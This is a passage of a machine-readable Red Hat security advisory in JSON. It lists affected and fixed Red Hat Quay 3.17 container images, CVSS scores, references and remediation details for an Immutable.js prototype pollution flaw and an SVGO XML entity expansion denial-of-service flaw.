          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-29063"
        },
        {
          "category": "external",
          "summary": "RHBZ#2445291",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445291"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-29063",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-29063"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063"
        },
        {
          "category": "external",
          "summary": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3",
          "url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"
        },
        {
          "category": "external",
          "summary": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8",
          "url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"
        },
        {
          "category": "external",
          "summary": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5",
          "url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"
        },
        {
          "category": "external",
          "summary": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw",
          "url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"
        }
      ],
      "release_date": "2026-03-06T18:25:22.438000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution"
    },
    {
      "cve": "CVE-2026-29074",
      "cwe": {
        "id": "CWE-776",
        "name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
      },
      "discovery_date": "2026-03-06T00:00:00+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2445132"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application\u0027s failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "svgo: SVGO: Denial of Service via XML entity expansion",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-29074"
        },
        {
          "category": "external",
          "summary": "RHBZ#2445132",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445132"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-29074",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-29074"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074"
        },
        {
          "category": "external",
          "summary": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673",
          "url": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673"
        }
      ],
      "release_date": "2026-03-06T07:23:05.716000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
